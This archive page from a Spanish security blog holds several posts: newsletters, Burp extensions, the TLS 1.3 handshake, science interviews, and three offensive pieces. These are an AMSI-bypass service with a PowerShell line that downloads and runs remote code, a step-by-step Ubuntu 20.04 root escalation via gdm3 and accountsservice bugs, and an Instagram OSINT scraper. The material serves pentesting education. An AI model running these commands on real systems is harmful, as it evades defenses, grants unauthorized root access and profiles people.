24 nov 2020

AMSI.Fail

Por el 24 nov 2020 con 0 comentarios

 ¡Buenas a todos!

En el artículo de hoy quería enseñaros una herramienta o utilidad que llevo bastante tiempo utilizando en algunos engagements. Si bien la herramienta no hace uso de ninguna técnica nueva para hacer un bypass de AMSI, lo que si hace es generar un bypass totalmente aleatorio. De esta forma, ningún payload tendrá la misma firma que otro. Para realizar esto, el creador de la herramienta @Flangvik, ha hecho uso de una Azure Function que genera un bypass de AMSI distinto cada vez que se invoca al método a través de una petición GET al recurso.


Actualmente, AMSI.fail hace uso de cuatro tipos de bypass:

Para facilitar el uso de la herramienta, el creador ha puesto a disposición de la comunidad un dominio llamado amsi.fail que hace de interfaz web para la Azure Function en cuestión. Permitiendo así, que cualquier usuario pueda copiar el payload con mayor facilidad.


Hay que tener en cuenta, que este bypass de AMSI, se realiza sobre el proceso donde se ejecuta el payload en cuestión, y que siempre se realiza en el contexto del usuario que lo ejecuta. Por ello, y para mayor comodidad en los engagements, os dejo dos comandos de PowerShell que llaman directamente a los métodos publicados de la Azure Function y evitan tener que acceder continuamente desde el navegador a la interfaz web.

$(Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/GenerateEnc).Content

IEX (New-Object Net.WebClient).DownloadString("https://amsi-fail.azurewebsites.net/api/Generate");


Si os ha gustado la herramienta no dudéis en echarle un vistazo y, añadirla a vuestro set de utilidades ;). De igual forma, os animo a que si queréis conocer en mayor detalle como funciona AMSI o la herramienta en cuestión, echéis un vistazo al repositorio donde encontraréis enlaces e información acerca de ello.

¡Saludos!

Leer más
      editar

23 nov 2020

No solo de Flu vive el hacker :)

Por el 23 nov 2020 con 1 comentario

Hola lectores. 

Hoy os voy a presentar cuatro newsletters/blogs de seguridad que yo sigo de manera regular y que me parecen muy útiles para estar informado de todo lo que pueda ir pasando en el mundillo de la ciberseguirdad a nivel internacional, aunque es cierto que la mayoría de ellos, se centran en USA.


El primero es SecurityWeekly. Aunque son parte de una compañía, sus blog y sus podcasts son de muy alto nivel, tratando multitud de temáticas y siendo muy activos en redes. Actualmente han montado un canal de Discord, con el que puedes intervenir directamente con ellos, aumentando la interactividad.  Han sido galardonados durante años con distintos premios por su contenido y su actividad formativa.

El segundo es el blog de ZackWhittaker, this week in security y es uno de mis favoritos. Se encarga de recopilar todo tipo de información reciente y relevante y está conformada por distintos apartados: THIS WEEK, TL;DR, donde están las noticias de la semana en sí, THE STUFF YOU MIGHT'VE MISSED, con noticias que pasaron desapercibidas anteriormente, THE HAPPY CORNER, con temas de humor relacionados con nuestro sector y THIS WEEK'S CYBER CAT, con fotos de gatos "ciber", que ya sabéis que en internet, los gatos siempre ayudan a tener visitas. 

Sumando visitas :)

El tercer canal de noticias que suelo seguir es ISACA SmartBrief. Desde el equipo de ISACA internacional, se dedican a recopilar las noticias de ciberseguridad que han salido publicadas en prensa y las categorizan por temáticas. De esta manera, tienes un pequeño resumen semanal de lo que ha sucedido, con la posibilidad de poder ampliar con un simple golpe de ratón el contenido. No suelen ser noticias tan técnicas como las que puedes encontrar en los otros blogs, pero suelen ser muy buenas para dar datos y estadísticas cuando alguien te intenta justificar que no necesita hacer nada en ciber.   




Y por último, os voy a hablar de Bruce Schneier. Para los que no sepáis quien es, es un criptógrafo, experto en seguridad informática, y autor de diversos libros de seguridad y criptografía. En su web tiene una newsletter, en la que habla de todo tipo de noticias que recopila del sector, desde hacking a cafeteras, hasta cómo funcionan los grupos cibercriminales. Son lecturas rápidas y entretenidas muy recomendables.


Supongo que muchas de ellas ya las conoceríais, pero si os he descubierto alguna que os pueda ser de utilidad, este post habrá merecido la pena. Eso si, no nos abandonéis para comenzar a seguir a estos compañeros, que hay contenido y conocimiento para todos ;)

Nos vemos pronto. 
Leer más
      editar

20 nov 2020

Burping in flavors

Por el 20 nov 2020 con 0 comentarios



¡Muy buenas a todos!

Hoy quería comentarles sobre cómo agregar extensiones a la herramienta más utilizada en auditorías web. ¡Eso es! tal y como se imaginarán, estoy hablando de nuestro querido Burp. En este post haremos una guía introductoria sobre cómo instalarlas, y si bien se trata de un proceso bastante sencillo (y hasta trivial), son muchos los beneficios que puede aportarnos, ya que con las extensiones de Burp podremos ampliar aún más el potencial de esta gran aplicación para casos de uso particulares y de esta forma agilizar nuestra auditoría.

Burp cuenta con un repositorio propio de extensiones, llamado BApp Store que nos permitirá instalarlas de una forma rápida y sencilla. En él se agrupan tanto desarrollos propios del equipo de Burp como de terceros que comparten sus creaciones con el resto de la comunidad. 

Podemos acceder a todos ellos seleccionando la opción correspondiente en la pestaña Extender dentro de la herramienta. Allí se nos mostrará un listado de todas las extensiones disponibles indicando, por ejemplo, Nombre, Popoularidad, Fecha de Última Actualización y Requisitos (cabe destacar que algunas de ellas requiren la edición Burp Suite Professional). En dicha tabla podremos aplicar distintos criterios de ordenación sobre las columnas, y en el panel lateral se nos ofrecerá información más detallada como Descripción, Autor, Versión, o algún otro aspecto que el autor haya considerado importante.

Realizar la instalación de una extensión es muy fácil ya que se trata de un proceso automático, basta con seleccionarla desde el listado y utilizar el botón indicado en el panel lateral. 

Instalando una extensión desde BApp Store

Una vez finalizado el proceso, veremos que se incluye una nueva pestaña en nuestra herramienta y es desde allí que podremos indicar los parámetros o configuraciones necesarias para poder utilizar nuestra nueva extensión. Podemos también instalar extensiones de forma manual desde la pestaña Extensions, para ellos debemos indicar el lenguaje de programación utilizado para desarrollar la extensión y seleccionar el archivo correspondiente. 

Las extensiones de Burp están principalmente desarrolladas en Java, aunque también existen algunas en Python o Ruby. En caso de querer instalar una extensión desarrollada en alguno de estos últimos, debemos descargar el intérprete Java para el lenguaje correspondiente (Jython o JRuby).

Si por ejemplo queremos agregar una extensión desarrollada en Python nos encontraremos con el botón de instalación desactivado, y con un mensaje que nos indica que debemos instalar el intérprete correspondiente.

La opción de Instalar se encuentra desactiva porque no contamos con el intérprete Java para Python

Al utilizar el botón se nos abrirá un navegador con la web oficial y desde allí descargaremos la versión StandAlone y la incorporaremos en la sección Python Environment dentro de la pestaña Options.

Agregamos el intérprete Jython en su versión StandAlone

Ahora se nos habilitará la opción y podremos instalar la extensión automáticamente para comenzar a utilizarla.
 

Ahora sí podemos instalar ;-)

Finalmente mencionar que desde esta misma pestaña podemos desactivar, desinstalar o incluso definir el orden en el que nuestras pestañas de extensiones son mostradas.

Desde acá podemos administrar las extensiones instaladas

En un futuro no muy lejano les contaremos sobre algunas extensiones interesantes que pueden ayudarnos en nuestras auditorías web. 

¡Hasta el próximo post! ¡Saludos!

Leer más
      editar

19 nov 2020

TLS1.3: ¿Qué hay de nuevo? (Parte II)

Por el 19 nov 2020 con 0 comentarios

En este segundo post vamos a describir cómo se inician las conexiones a través de TLS1.3.

El handshake tiene una estructura diferente, y más rápida en comparación con las versiones anteriores. En este caso las etapas que se producen son:

1. El cliente genera la clave para el intercambio 

2. El cliente envía el ClientHello, en el que se encuentra la siguiente información:
2.1. Una lista de las suites de cifrado que acepta
2.2. Una lista de claves públicas para realizar el intercambio de claves.
2.3. Versiones del protocolo que acepta el cliente. 

3. El servidor genera las claves para el intercambio.

4. El servidor envía el ServerHello de vuelta, con los siguientes datos:
4.1. La suite de cifrado elegida
4.2. La clave pública elegida para el intercambio de claves
4.3. La versión del protocolo 

5. Claves del handshake del servidor. Para cifrar el resto del handshake usa:
5.1. Clave pública del cliente
5.2. Clave privada del servidor
5.3. SHA256 del ClientHello y del ServerHello

El servidor calcula la clave secreta compartida, que es calculada a partir de ambos intercambio de claves (a través del algoritmo de curva elíptica curve25519 de Diffie Hellman).

6. Claves del handshake del cliente. El cliente usa:
6.1. La clave pública del servidor.
6.2. La clave privada del cliente.
6.3. El hash del SHA256 del ClientHello y del ServerHello

El cliente calcula la clave secreta compartida (de la misma forma que el servidor en el paso anterior)

7. El servidor envía el certificado.

8. El servidor envía una verificación del certificado en la que se enlaza la clave usada en el intercambio de claves, para confirmar su integridad.

9. El servidor termina comprobando que el proceso no se ha visto alterado, de forma que realiza un hash SHA256 resultante de todos los mensajes que forman el handshake (desde el paso 2 hasta el paso 8).

10. El servidor calcula las claves que serán usadas para cifrar el tráfico durante la sesión. Para ello usa:
10.1. La clave secreta del handshake
10.2. El hash resultante del paso 9

En este paso se realizan una serie de operaciones de las que resultan las claves de la aplicación para el cliente y el servidor.

11. El cliente realiza las mismas operaciones que el servidor en el paso anterior (obteniendo, por supuesto, los mismos valores para las claves).

12. El cliente da por terminado el handshake, y realiza el hash SHA256 resultante de todos los mensajes que forman el handshake (desde el paso 2 hasta el paso 8).

13. El cliente manda el mensaje “ping” al servidor 

14. El servidor crea las claves de sesión para cifrar la conexión.

15. El servidor manda el mensaje “pong” al cliente.

De forma esquematizada, podemos visualizar este proceso en el siguiente esquema:


Para un mayor nivel de detalle del handshake, podéis consultar el siguiente enlace: https://tls13.ulfheim.net/ 

Esperamos que hayáis descubierto algunas de las curiosidades con las que ha venido esta nueva versión de TLS.

Muchos maullidos!

M


Leer más
      editar

18 nov 2020

CSX-P Conquest (Time to play!)

Por el 18 nov 2020 con 0 comentarios

 Buenos días lectores. 

Aunque el CSX-P es una certificación no muy conocida fuera de Estados Unidos, hoy os os traigo este post para compartir con vosotros un pequeño juego que se han currado y que no quería que os pasase desapercibido. 

Si alguien está interesado en el tema de certificaciones, aquí (1,2,3) os dejo tres posts muy interesantes que tratan del tema. Sin embargo, hoy las certificaciones no son el foco de mi artículo, sino que de lo que quería hablaros es del CSX-P Conquest

CSX-P Conquest es un pequeño juego que consiste en una serie de breves videos iniciales, sobre los que nos realizan varias cuestiones (en su mayoría técnicas). Las respuestas correctas nos permitirán ir avanzando a lo largo de los niveles que han preparado (Identify, Protect, Detect, Respond & Recovery) y se nos medirán los tiempos que tardamos en solucionar los tests. 


El juego está en inglés, por lo que puede ser una limitación para todos aquellos que no estén acostumbrados a leer en el idioma de Shakespeare, sin embargo, las preguntas, se entienden bastante bien.

Esto es una simple curiosidad que no os robará mucho tiempo, pero que me ha resultado original y divertida y puede que en algún rato libre os apetezca probar :).

Me despido por hoy, ¡espero que los lectores de Flu Project estéis en los primeros puestos del ranking! 

Suerte y nos vemos pronto.

Leer más
      editar

17 nov 2020

Osi.ig: Una herramienta de OSINT para Instagram

Por el 17 nov 2020 con 0 comentarios

¡Buenas!

Hoy os queremos hablar de osi.ig, una herramienta open source mediante la que obtener información de perfiles de Instagram sin necesidad de disponer una cuenta en esta red social. Mediante esta herramienta se puede obtener información de un perfil, tanto público como privado y de sus últimas imágenes publicadas, por lo que por el momento no escanea stories, reels e IGTV.


Para poder utilizar la herramienta, tan solo es necesario disponer de Python3, clonar el repositorio y dar permisos de ejecución a los scripts de instalación de la herramienta. Su uso es muy sencillo y para obtener la información básica de un perfil basta con lanzar el comando:
python3 main.py -u username
Información básica de un perfil de Instagram

Además de recuperar información básica que pueda contener el perfil (nombre de usuario, descripción, url de la página web, seguidores, seguidos, número de publicaciones, si es un perfil público o privado, si es una cuenta de negocio,  imagen del perfil, etc.) también permite conocer si la cuenta está conectada a otra de Facebook, así como un listado de los hashtags más utilizados por dicho perfil.

Las opciones disponibles para el uso de la herramienta son las siguientes:

-h, --help: muestra la ayuda.

-u USERNAME, --username USERNAME: parámetro para indicar el perfil a escanear.

-p, --post: obtiene la información de las últimas imágenes publicadas.

-s, --savedata: guarda la información extraída en un fichero.

-t, --tags: muestra un listado de las etiquetas o hashtags más utilizados.

Información de las últimas publicaciones de un perfil de Instagram

Por otra parte, en las diferentes pruebas que se han realizado recuperando el listado con la información de las últimas publicaciones mediante la opción -p, los datos recuperados se corresponden con los propios de las fotografías publicadas (fecha, descripción, número de comentarios y likes, ubicación, enlace acortado a la imagen y una descripción de accesibilidad). En este sentido, se ha comprobado que el apartado referente a la ubicación recupera la localización con la que se ha etiquetado la publicación. Esto se debe a que Instagram permite etiquetar las publicaciones con una ubicación, que no tiene por qué corresponderse con la localización real o actual desde la que publica el perfil, por lo que no estaría recuperando un metadato de la imagen publicada sino información que estaría visible en la propia publicación.

Esperamos que esta herramientas os sirva de utilidad.

¡¡Saludos y hasta el próximo post!!

Leer más
      editar

16 nov 2020

Me siento privilegiado con mi Ubuntu 20.04

Por el 16 nov 2020 con 0 comentarios

Muy buenas a todos! Hoy queremos hablarles sobre escalada de privilegios, en particular sobre el sistema operativo Ubuntu 20.04, su versión LTS más reciente, lanzada a comienzos de este año. Hace algunos días el investigador de seguridad de GitHub, Kevin Backhouse, ha publicado un artículo en el cual informa que ha descubierto una manera muy sencilla de obtener una cuenta con permisos root a partir de un usuario sin privilegios.

Podríamos pensar que para poder elevar privilegios en un sistema operativo tan moderno necesitaríamos un exploit con varias líneas de código, pero sorprendentemente para llevar a cabo el proceso sólo se hace uso del entorno gráfico, unos pocos comandos, una denegación de servicio y mucho ingenio.

Según explica el investigador, utilizando la terminal desde un usuario sin privilegios se crea un enlace simbólico en su propio home llamado .pam_environment que apunta a /dev/zero

$ ln -s /dev/zero .pam_environment

Posteriormente se debe ingresar a las opciones de Configuración Regional e Idioma para cambiar el lenguaje del sistema.

Seleccionamos una nueva configuración de idioma

En ese momento se generará una Denegación de Servicio en account-daemon y este será el inicio del ataque. Analizando la salida de top podemos corroborar que el servicio comienza a consumir una gran cantidad de recursos del sistema.  

Captura comando top. Notar el elevado uso de CPU

Luego, eliminaremos el enlace simbólico creado anteriormente y detendremos el proceso correspondiente enviando la señal de SIGSTOP (podemos obtener el PID en cuestión desde la salida de top o de pidof ).

$ rm .pam_environment

$ kill -SIGSTOP <PID> 

Ahora es cuando hacemos la fantasía y prepararemos el terreno para luego cerrar la sesión. Lo primero que haremos es indicar una secuencia de comandos dentro de una shell. Entre los comandos debemos definir un timer que al finalizar dará lugar a la ejecución del comando kill con la señal SIGSEGV y luego nuevamente kill pero esta vez con la señal SIGCONT, ambos sobre el proceso en cuestión. Como todo esto queremos que se realice mientras estamos cerrando la sesión, haremos uso del comando nohup. Es importante que el tiempo definido sea suficiente para que nos permita completar el proceso para cerrar la sesión actual.

$ nohup bash -c "sleep 30s; kill -SIGSEGV <PID>; kill -SIGCONT <PID>"

Con esto estaremos mezclando los componentes para generar una especie de comando bomba que debemos plantar para que "explote" mientras cerramos la sesión.

Plantando la bomba

Una vez completado el proceso de cierre de sesión, y si todo sale bien, luego de unos segundos se nos presentará un asistente, con varios cuadros de diálogo, como el que debemos completar luego de instalar el Sistema Operativo y dentro del cual tendremos que crear un usuario.

Creamos un nuevo usuario mediante el asistente

Al completar el asistente se iniciará sesión para este usuario creado, la particularidad que tiene dicho nuevo usuario es que pertenecerá al grupo sudo y por lo tanto tendremos privilegios de administración.

Grupos a los que pertenece el usuario creado

Este método se aprovecha de dos bugs recientemente reportados que involucran al servicio de manejo de cuentas de usuario (accountsservice) y al servicio que maneja la pantalla de login (gdm3). En el primer caso los CVE involucrados son CVE-2020-16126 y CVE-2020-16127, mientras que en el segundo hacemos uso de CVE-2020-16125. Según reconoce el autor en su artículo, descubrió el proceso de forma casi accidental, lo que hace la historia aún más curiosa...

A escalar privilegios y hasta el próximo post!


Leer más
      editar

13 nov 2020

#FluConLaCiencia: Rafael Luque, Profesor e Investigador en la Universidad de Córdoba

Por Juan Antonio Calles el 13 nov 2020 con 0 comentarios

¡Buenas a todos! Con el artículo de hoy finalizamos la Semana de la Ciencia en Flu Project. Esperamos que haya sido de vuestro interés, y que, de todo corazón, hayamos podido acercaros un poco más a la investigación pública de nuestro país. Tenemos grandes profesionales que realizan trabajos excepcionales con recursos muy limitados, lo que sin duda merece todo nuestro apoyo y respeto. Para concluir, os traemos una entrevista especial. Tenemos el placer de tener con nosotros a Rafael Luque, uno de los grandes referentes de nuestro país, que nos hablará sobre su interesante carrera a nivel internacional. Todo un ejemplo para todos.

Juan Antonio Calles


Rafael Luque es licenciado por la Universidad de Córdoba (UCO) en 2001, doctor por la Universidad de Córdoba (2005) y actualmente Profesor Titular de Universidad del Departamento de Química Orgánica de la Universidad de Córdoba, donde retornó tras una estancia postdoctoral de tres años en la Universidad de York.

Con sus más de 550 publicaciones en revistas científicas de revisión por pares (índice h= 79; >29,000 citas, índice de impacto promedio de publicaciones de 7,0), 5 patentes en explotación, >10 libros editados, múltiples capítulos de libro y charlas invitadas en congresos internacionales en USA, Brasil, Hong Kong, Francia, Alemania, etc. Rafael es uno de los líderes científicos a nivel internacional de la investigación en el campo de la química sostenible, valorización de biomasa y residuos utilizando catálisis heterogénea. Rafael también es asimismo experto evaluador de la ANEP, de la Unión Europea (Programa FP7, Horizon2020, BBI y ERC Starting, Consolidator y Advanced Grants) así como de múltiples agencias internacionales de Reino Unido, Polonia, República Checa, Francia, Italia, Kazajistan, etc. Desde Enero de 2018, el Dr. Luque es Editor-in-chief de la revista Molecular Catalysis (Elsevier, i.f. 3.7) y desde 2015 Editor-in-Chief de la sección Porous Materials de la revista Materials (MDPI, i.f. 2.4), formando parte del Editorial Board y/o Advisory Board de prestigiosas revistas entre las que se incluyen Chemical Society Reviews (i.f. 40) y Green Chemistry (i.f. 9,5) de la Royal Society of Chemistry, ACS Sustainable Chemistry & Engineering (i.f. 7,6) de la ACS, ChemCatChem (i.f. 4,7) de Wiley, Scientific Reports (Springer/Nature, i.f. 3,5) y Topics in Current Chemistry (Springer, i.f. 5,5) y Catalysis Communications (Elsevier, i.f. 3,0), entre otras. Las investigaciones desarrolladas por el Dr. Luque en los últimos años han sido ampliamente premiadas a nivel internacional con numerosos reconocimientos entre los que se incluyen el Premio Marie Curie Prize de Jóvenes Investigadores del Instituto Andaluz de Química Fina (2011), el premio Green Talents 2011 del Ministerio Federal de Educación e Investigación de Alemania, el TR 35 Spain concedido por Technology Reviews y MIT como uno de los top 10 emprendedores de España en 2012, el prestigioso RSC Environment, Sustainability and Energy Early Career Award (2013) concedido por la RSC UK, la 2015 Lu Jiaxi lectureship del College of Chemistry and Engineering in Xiamen University (China) y la 2018 ACS Sustainable Chemistry & Engineering Lectureship award de la American Chemical Society. Asimismo, el Dr. Luque fue nombrado 2013 Distinguished Engineering Fellow del CBME en Hong Kong University of Science and Technology (Hong Kong) y actualmente es Visiting Professor de la Chinese Academy of Sciences en el State Key Laboratory of Electroanalytical Chemistry, Changchun Institute of Applied Chemistry (desde 2014) y Visiting Professor en Xiamen University (China, desde 2015) así como Ciencia Sem Fronteiras Pesquisador Especial en la Universidade Federal de Pelotas in Brazil (2015 2018). 

Desde primeros de 2018, el Dr. Luque es el Director del Scientific Center for Molecular Design and Synthesis of innovative Compounds for the Medical Industry de la RUDN University en Moscú, Rusia, siendo también Distinguished Chair Professor de la Xi´an Juaotong University en China (desde 2019) así como DFSP Distinguished Fellow del Departamento de Química de la King Saud University en Arabia Saudí. 

El Dr. Luque es asimismo co-fundador de las empresas Starbon Technologies Ltd. en York, Reino Unido en 2011, y la empresa Green Applied Solutions S.L

El Prof. Luque está presente en el listado de 2018, 2019 y 2020 Highly Cited Researchers (Clarivate Analytics) como uno de los 6,000 científicos más citados del mundo y único investigador de toda la universidad de Córdoba, con sus investigaciones citadas en el top 1% de sus áreas de conocimiento, un reconocimiento a la trayectoria científica entre los años 2006 a 2019.  

La investigación en España pasa por momentos críticos en la actualidad, necesitando una fuerte inversión en infraestructura y sobre todo en personal para los próximos años. La clase política aún no es consciente del papel de la ciencia y de la investigación en resolver los problemas del presente para un mejor futuro, ¡comenzando por el problema actual del coronavirus! En España hacemos una ciencia de excelencia prácticamente sin recursos, y sacamos petróleo de lo poco que tenemos… Me atrevería a decir que muchas de las actuales infraestructuras, y sobre todo el poco personal cualificado que va quedando en el país (debido a un éxodo masivo de científicos al extranjero por falta de oportunidades) no tienen nada que envidiar a lo existente en países como Estados Unidos, Suiza o Japón, y países emergentes como China.

Apoyemos y concienciemos a los que nos gobiernan para una fuerte inversión en ciencia para un mejor futuro! #sinciencianohayfuturo

Rafael Luque

Actualización del 13/11/2020

Desde Flu Project queremos mandar un cálido abrazo a Rafael y desearle una pronta recuperación.

Leer más
      editar

12 nov 2020

#FluConLaCiencia: Juana Morillas Ruiz, Profesora e Investigadora en el Departamento de Tecnología de la Alimentación y Nutrición de la UCAM

Por Juan Antonio Calles el 12 nov 2020 con 0 comentarios

¡Hola a los fieles seguidores de Flu-Project!

Me llena de orgullo y satisfacción (¡….!), y va en serio que, a través de este post, con motivo de la Semana de la Ciencia y la Investigación, pueda resumir mi experiencia como investigadora científica y con ello tener voz para manifestar que, sin el apoyo a la ciencia no hay sociedad que pueda progresar adecuadamente.

Mi nombre es Juana María Morillas Ruiz, soy doctora en Farmacia y trabajo desde hace más de 23 años como docente investigadora en la Universidad Católica San Antonio de Murcia (UCAM). 

Ya siendo estudiante en la Facultad de Farmacia de la Universidad de Granada tuve clara mi pasión por la investigación y por la docencia en el mundo universitario. Esta pasión empezó a materializarse cuando entré de alumna interna en el departamento de Bioquímica y Biología Molecular en la Universidad de Granada. Tuve la suerte de tener grandes maestros tanto en la docencia como en la investigación, que fueron los que realmente despertaron mi pasión. En aquel ya lejano departamento realicé lo que entonces se llamaba tesina, inicié la tesis doctoral, y al finalizar la carrera me ofrecieron un contrato de investigación que, por esas casualidades de la vida, me inició en el mundo de la investigación entre la Bioquímica y la Nutrición. De aquellos años, además de maravillosas amistades en el mundo de la Bioquímica, salieron publicaciones científicas y una experiencia investigadora muy valiosa (dada la juventud que tenía) incorporándome a diferentes proyectos. Todo ello eran buenos cimientos para dar solidez a un futuro profesional muy soñado por mí.

Pero en la mujer hay una casualidad cronológica que hace coincidir los años para el lanzamiento profesional con los años en los que la madre Naturaleza nos programa en la mejor versión para la maternidad, y esta versión dio sus frutos. Con tres embarazos y tres hijos muy seguidos no pude mantener esa dualidad de mujer trabajadora y madre, optando libre y orgullosa por ser madre a tiempo completo.

Por cuestiones profesionales de mi marido, a finales de los 90 nos habíamos trasladado a Murcia, donde una nueva universidad (la UCAM) estaba a punto de iniciar su andadura. Allí dejé un lunes de 1998 el curriculum (con un parón profesional de 6 años motivado por la crianza de los tres hijos) y el miércoles siguiente me llamaron, interesados desde la universidad por mí. Por esas casualidades que nos regala la vida, pretendían poner en marcha los estudios universitarios de Nutrición, donde encajaba perfectamente mi curriculum con experiencia investigadora en ese campo. Reconozco que no podía ser más feliz aquel día en el que empecé a trabajar en la UCAM, y que hoy mantengo la alegría, la ilusión y las ganas de hacerlo cada día mejor, como ese primero. 

Tras 23 años de dar clases en la universidad en la Facultad de Ciencias de la Salud a futuros nutricionistas, enfermeros, fisioterapeutas, médicos y farmacéuticos, en disciplinas como la Bioquímica y la Farmacología, además investigo en líneas tan maravillosas en su aplicación directa a nuestra sociedad como son el estrés oxidativo en deportistas, ancianos, enfermos de Alzheimer, con el desarrollo de alimentos funcionales ricos en antioxidantes. Evaluamos el efecto que ejercen los distintos tipos de antioxidantes disminuyendo ese estrés oxidativo, (que hoy sabemos que es la alteración bioquímica que tienen en común patologías tan dispares como el cáncer, la diabetes, el alcoholismo, la esquizofrenia, la obesidad, la enfermedad cardiovascular, etc…) e incluso situaciones fisiológicas como el embarazo o la actividad física de alta intensidad o sin el entrenamiento adecuado. Junto a esta línea de investigación, llevo otra línea que analiza el efecto de las distintas grasas que aporta la dieta sobre el estrés oxidativo asociado al riesgo cardiovascular. En todos mis proyectos siempre reservo un apartado para evaluar nutricionalmente a la población del estudio (lo que nos permite una interacción humana con estos voluntarios) y llevar a cabo una educación nutricional que mejore la calidad de vida a través de mejorar la alimentación. Esa es una de las grandes satisfacciones de este trabajo, además de las que  se derivan de los resultados en la producción científica con invitaciones como ponente a más de 100 congresos nacionales e internacionales, decenas de artículos científicos en revistas de impacto, varios libros publicados (y más aún si se trata de colaboraciones en capítulos de libros), invitaciones para divulgación científica en radios y televisiones, reconocimientos en forma de Premio Extraordinario de Doctorado y varios premios a la investigación.

Sigo entrando en las aulas (o en estos días en las clases en streaming) con la misma ilusión de mis primeros días, aunque sumando la experiencia… creo que serán mejores clases. Sigo diseñando proyectos, escribiendo artículos, revisándolos y participando en tareas de gestión de la universidad con las mismas ganas de quien empieza. Esa energía solo puede salir de dentro, cuando eres realmente feliz con lo que haces, y eso no es ningún mérito personal, es una forma de vida que compartimos muchos, muchos de los que nos dedicamos a la Ciencia.

Y para seguir dedicándonos a la Ciencia, y mejorando nuestra sociedad, es necesario que desarrollemos proyectos, proyectos que necesitan ser financiados. Agradezco esta invitación, para gritar que cada individuo viene al mundo con una obligación: aportar algo para dejar un mundo mejor. Los científicos debemos cumplir con ella investigando, y para ello necesitamos que los poderes responsables adjudiquen a la investigación los fondos necesarios. 

Gracias a ti lector@, que tal vez además de seguidor de Flu-Project, tengas capacidad de acción sobre los fondos que se adjudican para mejorar nuestro mundo a través de la investigación en Ciencia. 

Un abrazo

Dra Juana Morillas Ruiz


Leer más
      editar

11 nov 2020

#FluConLaCiencia: Mario Martín Gamboa, Profesor e Investigador Postdoctoral en Tecnologías Industriales

Por Juan Antonio Calles el 11 nov 2020 con 0 comentarios

Mi nombre es Mario Martín Gamboa y actualmente formo parte del Personal Docente e Investigador de la Universidad Rey Juan Carlos (URJC) a través de la obtención de una Beca de Investigación de Atracción de Talento, financiada por el Gobierno Regional de la Comunidad de Madrid. Dentro de mi formación académica, soy Doctor en Tecnologías Industriales: química, medio ambiente, energía, electrónica, mecánica y materiales por la URJC (2017) obteniendo el Premio Jóvenes Investigadores URJC a la mejor tesis dentro del área de ingeniería y el Premio Extraordinario de Doctorado en los años 2018 y 2020, respectivamente. Además, soy licenciado en Ciencias Ambientales por la URJC y en 2014 obtuve mi título de Máster en Energías Renovables, Pilas de Combustible e Hidrógeno por el Consejo Superior de Investigaciones Científicas (CSIC) en colaboración con la Universidad Internacional Menéndez Pelayo (UIMP). Respecto a mi experiencia profesional, fui investigador predoctoral en la Unidad de Análisis de Sistemas del Instituto IMDEA Energía entre 2013 y 2017, realizando en este periodo una estancia de 3 meses en el IFE (Instituto de Tecnología Energética) en Noruega. A principios de 2018 y hasta mayo de 2020 ejercí como investigador postdoctoral en el Departamento de Medio Ambiente y Ordenación de la Universidad de Aveiro (Portugal). Hasta la fecha, he participado en 16 proyectos de investigación y contratos a nivel nacional e internacional. Además, he publicado 24 artículos en revistas internacionales de alto impacto y más de 35 contribuciones en conferencias nacionales e internacionales.

Mi línea de investigación principal es el desarrollo y la aplicación de metodologías avanzadas para la evaluación de sostenibilidad de productos y sistemas, teniendo en cuenta criterios ambientales, económicos, sociales y técnicos. Actualmente el concepto de sostenibilidad se considera como un eje de acción fundamental para abordar los principales retos a los que la sociedad tiene que hacer frente. A pesar de ser un concepto con más de 40 años de historia, en la última década ha cobrado un mayor protagonismo debido a la aceleración de los efectos provocados por el cambio climático como, por ejemplo, degradación de los ecosistemas, pérdida de biodiversidad, o desigualdad social. En los últimos años, este protagonismo también se ha visto reflejado y recogido en un considerable número de iniciativas internacionales como, por ejemplo, el Acuerdo de Paris o el establecimiento de los Objetivos de Desarrollo Sostenible, los cuales están marcando la agenda global de numerosos países. Dentro del contexto de la Unión Europea, el Green Deal o la nueva taxonomía verde son algunos de los grandes avances que ejemplifican el movimiento hacia una economía sostenible. Sin embargo, para poder dar solución al contexto actual y aplicar de manera adecuada los acuerdos y hojas de ruta que se están estableciendo de manera global, primero es necesario evaluar estos impactos, es decir, medir su desempeño de sostenibilidad. La naturaleza multidimensional e interconectada de la sostenibilidad en términos de recursos ecológicos, realidades sociales y sistemas económicos hace que medir este concepto de manera práctica sea todo un reto metodológico.

En este sentido, el objetivo principal a abordar dentro del contexto de mi beca es desarrollar avances metodológicos basados en enfoques de ciclo de vida con el objetivo de contribuir hacia la implantación de sistemas y productos más sostenibles. Las metodologías de ciclo de vida son consideradas fundamentales por organismos como la Comisión Europea o las Naciones Unidas debido a que permiten evaluar de manera exhaustiva impactos potenciales asociados a productos o sistemas, desde la adquisición de materias primas hasta el fin de vida de estos. La viabilidad de estos avances será probada en dos sectores que desempeñan un papel relevante en términos ambientales, económicos y sociales: el sector energético y químico. Ambos sectores se consideran clave para ofrecer soluciones que contribuyan a una futura sociedad descarbonizada y sostenible.

 


Figura. Filosofía de los enfoques de ciclo de vida.

Al igual que algunos de los compañeros que han contribuido a esta iniciativa, me gustaría acabar utilizando este blog como un altavoz para destacar el papel relevante que desempeña la investigación. Son necesarios mayores esfuerzos por parte de la clase política, empresarial y desde los propios investigadores para que nuestros avances repercutan y favorezcan directamente a la sociedad. También, ánimo a nuestros jóvenes a que se acerquen a la ciencia ya que ambos son clave para el futuro de nuestro país.


Leer más
      editar

10 nov 2020

#FluConLaCiencia: Patricia Rada Llano, Investigadora Postdoctoral en el IIBm

Por Juan Antonio Calles el 10 nov 2020 con 0 comentarios

Buenas a todos los seguidores de Flu-Project. Mi nombre es Patricia Rada Llano y actualmente soy investigadora postdoctoral en el Instituto de Investigaciones Biomédicas Alberto Sols (IIBm, UAM-CSIC) y en el Centro de Investigación Biomédica en red sobre Diabetes y Enfermedades Metabólicas Asociadas (CIBERDEM) en Madrid. A lo largo de mi carrera investigadora he participado en la publicación de 26 artículos de investigación en revistas científicas de impacto y he dirigido varios trabajos de Fin de Grado y Fin de Máster en diversas universidades públicas de Madrid. 

